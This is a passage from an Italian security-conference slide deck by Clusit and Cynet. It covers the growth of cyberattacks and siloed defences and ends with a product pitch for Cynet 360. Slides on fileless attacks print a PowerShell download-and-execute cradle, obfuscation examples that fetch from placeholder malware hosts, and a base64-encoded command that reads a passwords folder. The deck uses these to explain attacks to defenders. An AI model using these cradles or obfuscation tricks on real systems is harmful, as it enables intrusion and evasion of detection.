Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico

Pagina creata da Viola Baroni
 
CONTINUA A LEGGERE
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Atelier

  Tanti tool di security ma gli incidenti
 aumentano, serve un approccio olistico
Mauro Cicognini, Comitato Direttivo Clusit
Luca Martinis, Security Engineer Southern Europe, Cynet

4 giugno 11:00-12:00 - StreamingEdition
        #securitysummit #academy #streamingedition
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Mauro Cicognini
            Slide di sfondo
                       Testo editabile
MEMBRO DEL CONSIGLIO DIRETTIVO CLUSIT

                               2
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Agenda
•   Stato della cybersecurity
•   La crescita degli attacchi
•   Contromisure?
•   Le sfide che le aziende devono affrontare
•   Con quali strumenti affrontiamo le minacce?
•   Il disinnesco di attacchi evoluti

                           3
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Stato della cybersecurity
• Investimenti crescenti
• Un mercato molto
  complesso
• Soluzioni tecnologiche
  sempre più spinte

• Preoccupazione crescente
  per le attività illecite e le
  loro conseguenze

                                  4
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Mercato mondiale della cybersecurity
300

                                                                            248,26
250
                                                           223,68
                                                  202,97
200                                  184,19
                        167,14
               151,67
150   137,63

100

 50

  0
      2017     2018     2019            2020      2021     2022              2023
                                 USD (Miliardi)                     Fonte: www.statista.com

                                    5
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Un mercato molto affollato
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Crescita di frequenza degli attacchi (ca. 15% annuo)
               Numero di attacchi rilevati per anno (2014 - 2019)
 1750
 1650
 1550
 1450
 1350
 1250
 1150
 1050
  950
  850
  750
        2014             2015                   2016                     2017            2018   2019

                                © Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia

                                                        7
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Crescita di intensità degli attacchi
                                        Motivazioni d’attacco 2014 - 2019

 90%                       83%
                     79%
                  76%
 80%        72%
         68%
 70%
       60%
 60%                                                                                                                    2014
                                                                                                                        2015
 50%
                                                                                                                        2016
 40%
                                                                                                                        2017
                                                                 27%
 30%                                                                                                                    2018
                                                                       21%
 20%                                           13% 12%                    15%                                           2019
                                 8%   9% 8% 11%                                 7%
 10%                                                                                 4% 3%      5%        5% 6% 4%
                                                                                                     2%            2%
  0%
         CYBERCRIME                   ESPIONAGE                      HACKTIVISM                      INFO. WAR.

                                       © Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia

                                                               8
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Crescita di efficacia degli attacchi
                            Attack Severity
60%

50%

40%

30%

20%

10%

0%
          Medio                              Alto                            Critico
                               2017       2018       2019
                    © Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia

                                         9
Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
Crescita di intrusività degli attacchi
               Distribuzione % tecniche di attacco (2014 - 2019)
 45%
 40%
 35%
 30%
 25%                                                                           2014
 20%                                                                           2015
 15%                                                                           2016
 10%                                                                           2017
 5%                                                                            2018
 0%                                                                            2019

                      © Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia

                                             10
Tecniche utilizzate nel 2019
• Eliminando gli attacchi
                                            Account       0-day DDoS
                                            Cracking       2%    2%
                                  APT /        5%
                                 Tecniche
  con tecnica non nota,          Multiple
                                   6%

  otteniamo che l’85%
                                        Vulnerab.
  degli attacchi avviene                   9%

  con metodologie ben                        Phishing /
                                                                                   Malware
                                                                                    54%
                                              Social
  conosciute                                Engineering
                                               22%

                                        © Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia

                            11
Quindi???
• Investiamo sempre di più
• Con soluzioni sempre più
  sofisticate

• I cattivi continuano a vincere
• Dov’è il problema??

                           12
Un problema di velocità
• Evidentemente le
  necessità crescono più
  velocemente dei
  rimedi
• Perché?

                           13
Motivazioni
• La scarsità di know-how
  è palpabile
• Lo sappiamo di sicuro
  da numerose indagini
• Tutti conosciamo
  situazioni dove mancano
  le persone giuste,
  oppure le persone giuste
  sono nel posto sbagliato
                             14
Miglioramento dei processi
• In molte realtà i processi di
  sicurezza devono ancora
  maturare
• Esistono molti schemi e
  proposte
• L’importante è adottarne
  uno e sfruttarlo appieno
• P.e.quello proposto dal
  NIST
   • https://www.nist.gov/cyber
     framework/framework               Fonte: NIST

                                  15
Tecnologia
• Naturalmente, è meglio
  farsi aiutare dalla
  tecnologia
• Tecnologia ben
  implementata, perché
  altrimenti non serve
• Occorrono i processi e
  le persone in grado di
  farli funzionare
                           16
Luca Martinis Slide di sfondo
                      Testo editabile
SECURITY ENGINEER SOUTHERN EUROPE, CYNET

                              17
Il paradosso delle attuali misure di protezione
                                                 Diminuzione del ritorno sugli
   Numero di violazioni in aumento
                                                   investimenti in sicurezza
1800
1600
1400
1200
1000
800
600
400
200
  0                                                                                    2019
       2006 2008 2010 2012 2014 2016 2018

                Source: marketwatch.com                Source: based on statista.com

                                            18
La Causa: Soluzioni di Security a silo

         ANTIVIRUS
                                           Disparate Point Products
                                           Each product covers a mere subset of threats

             ANTIVIRUS
                                           without communicating with its peers

     EMAIL               USER              Hard Deployment
PROTECTION               BEHAVIOR          40% avg. security product implementation rate
SANDBOX
                 SIEM
                         ANALYTICS

                                           Manual Integration
                                           Creating a holistic threat visibility requires
                                           significant skill and time resources
        DECEPTION
        NEXT-GEN
         ANTIVIRUS                         Partial Threat Coverage
                                           Critical attack vectors are left unattended

                                      19
Le sfide che l’azienda deve affrontare
Le nuove piattaforme devono abilitare le aziende nel superare:

                 Il team di sicurezza è                        Implementazione
                 troppo piccolo per                            manuale e configurazione
         Staff   rispondere in modo                    Time    di più prodotti di sicurezza
                 efficiente a tutti gli avvisi                 che richiedono tempo

                                                               Il budget non è sufficiente
                 Carenza di personale                          per acquistare tutti i prodotti
                 qualificato in grado di                       e i servizi necessari per
       Skill     affrontare minacce avanzate          Budget   proteggersi da attacchi e
                                                               minacce avanzate

                                                 20
Incremento negli attacchi di phishing

             March 2020: Italy Stands out
                                                                        April 2020: The World Follows Suit
                                                                   80
                                                                                                             90
                                                                   70                                        80
                                                                   60                                        70
                                                                                                             60
                                                                   50
                                                                                                             50
                                                                   40                                        40
                                                                   30                                        30
                                                                                                             20
                                                                   20
                                                                                                             10
                                                                   10                                        0
                                                                   0
Israel   Japan   Benelux France Germany   Italy   UK         USA

         February 15 -March 15 2020   Monthly Average 2019

                                                                   21
Incremento nei Malicious Remote Logins (Global)

                        Malicious Logins
900
800
700
600
500
400
300
200
100
 0
 Sep-19   Oct-19   Nov-19   Dec-19   Jan-20   Feb-20   Mar-20   Apr-20

                                22
Incremento negli Email Based Attacks (Global)

10000

 9000

 8000

 7000

 6000

 5000

 4000

 3000

 2000

 1000

   0
   Sep-19   Oct-19   Nov-19   Dec-19   Jan-20   Feb-20   Mar-20   Apr-20

                                 23
Distribuzione dei Malware via Email

                               Percentages

Weaponized document: Macro
                                         18%
                                               31%
Weaponized document: Office
Exploit
Email with link to malicious
website
Email containing malicious               40%   11%
executable

                                    24
Incremento negli ingaggi CyOps

1000
900
800
700
600
500
400
300
200
100
  0
  Oct-19   Nov-19   Dec-19   Jan-20   Feb-20   Mar-20   Apr-20

                             25
Campagna di phishing
legata al Covid:

•   Dal 1 giugno, rilascio
    della app Immuni per il
    controllo del
    distanziamento sociale
•   ransomware
•   immuni.exe

                              26
LOL
LOL ≠ Lot Of Laughs

Per le aziende colpite da questi attacchi
c’è ben poco da ridere.

Living Off the Land:
• LoLBins
• LoLdlls
• LoLBaS

•   LoL.. everything

(source: https://lolbas-project.github.io)

                                             27
POWERSHELL
Powershell fileless attack example:

•   powershell.exe – exec bypass
           “IEX(New-Object Net.WebClient).DownloadString(’http://www.demo.local/cybad.ps1’)”

PowerShell execution options:

•   Registry - This technique was extensively used by Poweliks and kovter malware variants (mshta or rundll
    + ActiveXObject)

•   File - .ps1 / .VBS / .BAT and scheduled task

•   Macros - Office files- Word, Excel, etc.

•   Remotely - PowerShell Remoting (PSS), PsExec, WMI

                                                    28
OBFUSCATION
PowerShell obfuscation techniques:

1.   Concatenation – split strings into multiple parts which are concatenated through the “+” operator as example.
                  $a = http://malware.com/cybad.exe ---> b = (‘h’+’ttp://ma’+’lware.com/cybad.exe’)

2.   Reordering – formatting operator (-f), the string is divided in several parts and will reorder by the (-f).
                  “{1}{0}” -f ‘x’,’IE’

3.   Escaping character– escape character (‘) to trick the analyst to understand command, typically into the middle of the string
                  http://malware.com/cybad.exe à $a = (“http://mal`ware.c`om.cy`bad.ex`e”)

4.   Base64 format – (–EncodedCommand) accepts a base-64 encoded string .
                  Start-Process “dir “c:\passwords”” à ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA=0g
                  powershell.exe -encodedCommand ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA=

5.   Up/Low case – random uppercase or lowercase in the script.

6.   White spaces – random white spaces are inserted between words.
(https://www.cynet.com/blog/powershell-obfuscation-demystified-series-chapter-2-concatenation-and-base64-encoding/)

                                                                                          29
La Soluzione: Autonomous Breach Protection

     Environment

Endpoint                                            Block traffic
               Network

                                                                    Isolate
                                                                    endpoint
  User      File                                    Disable user
                                                       account

Avere completa               Capire il contesto         Decidere
   visibilità                                            e Agire

                                   30
Sensor
Fusion:                "La fusione dei sensori combina i
                            dati provenienti da fonti
L'intero è                 disparate in modo che le
                             informazioni risultanti
maggiore della             raggiungano un livello di
                          precisione che non sarebbe
                            possibile se queste fonti
somma delle sue                venissero utilizzate
                                 singolarmente."

parti

                  31
Autonomous Breach Protection
                      Powered by Cynet Sensor Fusion™

             File Activity
                                                                              Monitoring &
           Process Activity
                                                                              control

                  Memory Activity
                                                                   BREACH     Attack
                                                                 PROTECTION   prevention &
                                       Generating True Context
                                                                              detection
              Network Traffic
                                                                              Response
       User Account
                                                                              orchestration
         Activity

SENSOR ARRAY                    FUSION AND ANALYSIS                        AUTOMATED
                                                                         PRECISE ACTION

                                              32
Autonomous Breach Protection
                    Powered by Cynet Sensor Fusion™

      Files upload attempted

             No screen interaction                                          Block traffic

                      Host is
                     operated
                                                                 BREACH
                     remotely
                                                               PROTECTION   Isolate host
                                     Generating True Context
                                        Data Exfiltration

                                                                            Disable user
       Off working hours                                                    account

SENSOR ARRAY                    FUSION AND ANALYSIS                      AUTOMATED
                                                                       PRECISE ACTION

                                            33
Servizio di Incident
                                                           Response incluso
                    Smart Agent

Deploys itself on 5000 hosts in 1 hour        Auto-deployment on new hosts

                                         34
3 opzioni
          Cynet 360 Architetture            1 licenza

On-Prem               SaaS         Hybrid

                         35
1 licenza
                                   Tutto incluso

                    Technologies
                      Services

Cynet 360
Capabilities

               36
CyOps Managed Detection and Response Services

•    Alert Monitoring
•    24/7 Availability
•    On-Demand File Analysis
•    Remediation Instructions
•    Exclusions, Whitelisting and
     Tuning
•    Threat Hunting
•    Attack Investigation / Incident
     Response

                                       37
Autonomous
Breach Protection for the
Autonomous CISO

 • Visibilità in tempo reale
   dello stato di sicurezza

 • Ingaggio del CyOps
   team in un click

                               38
The evolution of Endpoint
                                    Protection tools
                                                                ✓ Vendors with Added Automated
                                                                  Remediation

                                                                ✓ Vendors Directly Providing MDR Services

                                                                ✓ Vendors with combined Network Analytics
                                                                  and Threat Intelligence

                                                                ✓ Vendors with MITRE ATT&CK Categorized
                                                                  Controls

                                                                ✓ Vendors providing SIEM and SOAR
                                                                  Integration

                                                                ✓ Vendors providing Unified Endpoint Security
                                                                  Platforms

                                                                ✓ Vendors for Incident Response and Forensics

                                                                ❖ Combined Mobile Device and Desktop/Laptop
                                                                  EDR
Source: Gartner Market Guide - January 2020

                                                   39
Cynet 360 Benefici
•   Ridurre radicalmente il tempo impiegato nella distribuzione e nella gestione

•   Risparmia denaro che altrimenti veniva speso per i prodotti NGAV, EDR, UBA, Network
    Analytics e Deception

•   Consolidare la protezione contro tutti i prodotti e le minacce avanzate in un'unica piattaforma

•   Abilita il team di sicurezza a risolvere rapidamente gli incidenti con prevenzione, rilevamento
    e risposta automatizzati

•   Migliora le competenze e le capacità del team di sicurezza con CyOps

•   Fornisci visibilità e controllo CISO 24 \ 7 con l'app Cynet CISO

                                                40
Grazie per averci
ascoltato fin qui!

   Domande?

                     41
Puoi anche leggere